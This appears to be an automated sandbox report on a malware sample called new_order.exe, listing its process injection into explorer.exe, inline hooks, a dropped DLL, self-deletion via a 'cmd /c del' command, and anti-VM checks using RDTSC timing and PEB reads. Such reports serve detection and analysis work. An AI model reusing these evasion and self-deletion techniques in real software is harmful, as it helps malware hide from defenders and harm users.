          Source: C:\Users\user\Desktop\new_order.exeProcess created: C:\Users\user\Desktop\new_order.exe "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Users\user\Desktop\new_order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\new_order.exeFile created: C:\Users\user\AppData\Local\Temp\nsv94CB.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/2
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\new_order.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: explorer.pdbUGP source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: new_order.exe, 00000001.00000003.684420646.000000001AE80000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000001.00000003.688778251.000000001ACF0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: new_order.exe, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041E9E6 push 23797168h; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0040E341 push ebp; retf
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409BCD push ebx; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00419C33 push cs; retf
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D4F2 push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D4FB push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D4A5 push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_0041D55C push eax; ret
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_004085C2 push edi; retn 6E42h
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00419FF2 push edi; iretd
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0495D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041E9E6 push 23797168h; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0040E341 push ebp; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00409BCD push ebx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00419C33 push cs; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D4F2 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D4FB push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D4A5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0041D55C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00419FF2 push edi; iretd
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\new_order.exeFile created: C:\Users\user\AppData\Local\Temp\nsq94FC.tmp\yvucmw.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\new_order.exe"
          Source: C:\Users\user\Desktop\new_order.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\Desktop\new_order.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\new_order.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\new_order.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6268Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6452Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\new_order.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\new_order.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\new_order.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.736579180.000000000A83C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.721102836.000000000A897000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.736036240.000000000A60E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.736087162.000000000A64D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.717209975.0000000006650000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.736036240.000000000A60E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.736203145.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000005.00000000.729403945.0000000004710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.736203145.000000000A716000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.736087162.000000000A64D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 63}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
          Source: explorer.exe, 00000005.00000000.712962189.0000000004791000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: explorer.exe, 00000005.00000000.701800617.000000000A784000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\new_order.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_02180744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 1_2_021806C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00B21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A7C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A82990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00AE41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A74120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\new_order.exeCode function: 3_2_00A82AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04909080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_049C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0492746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04932990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0493FD9B mov eax, dword ptr fs:[00000030h]
